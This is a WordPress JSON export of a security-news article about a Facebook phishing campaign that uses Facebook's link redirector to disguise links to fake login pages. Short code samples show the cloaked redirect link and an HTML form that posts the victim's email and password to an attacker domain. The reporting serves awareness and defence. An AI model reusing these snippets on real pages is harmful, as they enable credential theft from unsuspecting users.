{"id":7047,"date":"2025-09-19T10:03:28","date_gmt":"2025-09-19T10:03:28","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/09\/19\/new-phishing-attack-targets-facebook-users-to-steal-login-credentials\/"},"modified":"2025-09-19T10:03:28","modified_gmt":"2025-09-19T10:03:28","slug":"new-phishing-attack-targets-facebook-users-to-steal-login-credentials","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/09\/19\/new-phishing-attack-targets-facebook-users-to-steal-login-credentials\/","title":{"rendered":"New Phishing Attack Targets Facebook Users to Steal Login Credentials"},"content":{"rendered":"<p>    New Phishing Attack Targets Facebook Users to Steal Login Credentials<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials.<\/p>\n<p>Attackers leverage the platform\u2019s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages.<\/p>\n<p>The initial lure arrives as an urgent security notification, warning users of \u201cunauthorized access attempts\u201d or prompting them to verify account activity.<\/p>\n<p>The email\u2019s design closely mirrors Facebook\u2019s styling, complete with social media icons and footer disclaimers, creating a sense of authenticity and leading recipients to click without hesitation.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjNU010LXbxMHIiB1dy2Zw9OwxQ3PjdvJvt6l2IRcNkbDtJCZQ59eXY65PgF7bi2CsCRah8aXUEGiJvjlMH-zXdLBo_Nk1dTOhU8TAzk7BBbXmwKYcTvHAFhoAQOlux7uVkpYlzVikmpjGk7o8InZSLUhqcJ6tR8CiGf4FSTERuRVVW6GNMzoDWCwl2sGk\/s16000\/Phishing%2520%28Source%2520-%2520X%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Phishing (Source \u2013 X)<\/figcaption><\/figure>\n<\/div>\n<p>The campaign\u2019s reach spans multiple languages, including English, German, Spanish, and Korean, broadening its potential victim pool.<\/p>\n<p>Phishing URLs consistently follow a pattern of benign domains forwarded through Facebook\u2019s redirector service (e.g., httpst.co\/MS24b2xu6p), which then reroute to attackers\u2019 infrastructure.<\/p>\n<p>SpiderLabs analysts <a href=\"https:\/\/x.com\/SpiderLabs\/status\/1968352824745443785\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> this technique after examining dozens of email samples, noting how the redirect mechanism both evades link scanners and bypasses user suspicion.<\/p>\n<p>Victims who follow the link encounter a near-perfect replica of Facebook\u2019s login interface, where credentials submitted are immediately exfiltrated to a command-and-control server.<\/p>\n<p>On successful submission, the fake portal executes a brief JavaScript snippet to display an \u201cIncorrect password\u201d error, prompting users to re-enter their details\u2014unwittingly supplying attackers with valid credentials on the second attempt.<\/p>\n<p>The harvested data includes <a href=\"https:\/\/cybersecuritynews.com\/fake-timesheet-report-email-leading\/\" target=\"_blank\" rel=\"noreferrer noopener\">email<\/a> addresses, phone numbers, and passwords, which are stored in a PHP backend script for later retrieval by threat actors.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-redirect-based-infection-mechanism\"><strong>Redirect-Based Infection Mechanism<\/strong><\/h2>\n<p>The core innovation of this phishing campaign lies in its abuse of Facebook\u2019s external URL warning system as an infection mechanism.<\/p>\n<figure class=\"wp-block-embed aligncenter is-type-rich is-provider-twitter wp-block-embed-twitter\">\n<div class=\"wp-block-embed__wrapper\">\n<div class=\"embed-twitter\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/1f6a8.png?ssl=1\" alt=\"\ud83d\udea8\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\"><a href=\"https:\/\/twitter.com\/hashtag\/PhishingAlert?src=hash&amp;ref_src=twsrc%5Etfw\">#PhishingAlert<\/a>: We spotted a new <a href=\"https:\/\/twitter.com\/hashtag\/Facebook?src=hash&amp;ref_src=twsrc%5Etfw\">#Facebook<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/phishing?src=hash&amp;ref_src=twsrc%5Etfw\">#phishing<\/a> campaign abusing the platform\u2019s external URL warning system (<a href=\"https:\/\/t.co\/MS24b2xu6p\">https:\/\/t.co\/MS24b2xu6p<\/a>). Attackers use this redirect to make links appear legitimate, luring victims to fake login portals that harvest credentials. Emails are\u2026 <a href=\"https:\/\/t.co\/YexCmbIl9z\">pic.twitter.com\/YexCmbIl9z<\/a><\/p>\n<p>\u2014 SpiderLabs (@SpiderLabs) <a href=\"https:\/\/twitter.com\/SpiderLabs\/status\/1968352824745443785?ref_src=twsrc%5Etfw\">September 17, 2025<\/a>\n<\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div>\n<\/div>\n<\/figure>\n<p>Rather than linking directly to malicious domains, attackers construct a URL of the form:-<\/p>\n<pre class=\"wp-block-code\"><code>&lt;a href=\"https:\/\/l.facebook.com\/l.php?u=https%3A%2F%2Fataloraxmalicious.co%2Ffb.php&amp;h=AT0Xyz\u2026\"&gt;\n  Verify Your Account\n&lt;\/a&gt;<\/code><\/pre>\n<p>This link leverages Facebook\u2019s l.facebook.com redirect service, embedding the actual phishing site in the <code>u=<\/code> parameter.<\/p>\n<p>When clicked, Facebook presents a warning banner but ultimately forwards the victim to the malicious page, lending credibility to the destination.<\/p>\n<p>Once on the <a href=\"https:\/\/cybersecuritynews.com\/raccoono365-phishing-service\/\" target=\"_blank\" rel=\"noreferrer noopener\">phishing site<\/a>, the HTML form collects credentials via:-<\/p>\n<pre class=\"wp-block-code\"><code>&lt;form action=\"https:\/\/ataloraxmalicious.co\/fb.php\" method=\"POST\"&gt;\n  &lt;input type=\"text\" name=\"email\" autocomplete=\"username\"\/&gt;\n  &lt;input type=\"password\" name=\"pass\" autocomplete=\"current-password\"\/&gt;\n  &lt;button type=\"submit\"&gt;Log In&lt;\/button&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>Upon submission, a <a href=\"https:\/\/cybersecuritynews.com\/javascript-attacks-targeting\/\" target=\"_blank\" rel=\"noreferrer noopener\">JavaScript<\/a> routine triggers a second redirect back to Facebook, displaying an error notice to the user and minimizing suspicion.<\/p>\n<p>This redirect-based infection mechanism not only bypasses email security gateways but also exploits user trust in Facebook\u2019s domain, making detection and prevention significantly more challenging.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong><code><strong><code><strong>Find this Story Interesting! Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get More Instant Updates<\/strong>.<\/code><\/strong><\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-phishing-attack-targets-facebook-users\/\">New Phishing Attack Targets Facebook Users to Steal Login Credentials<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-phishing-attack-targets-facebook-users\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Phishing Attack Targets Facebook Users to Steal Login Credentials A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials. Attackers leverage the platform\u2019s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7047","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7047"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7047"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7047\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}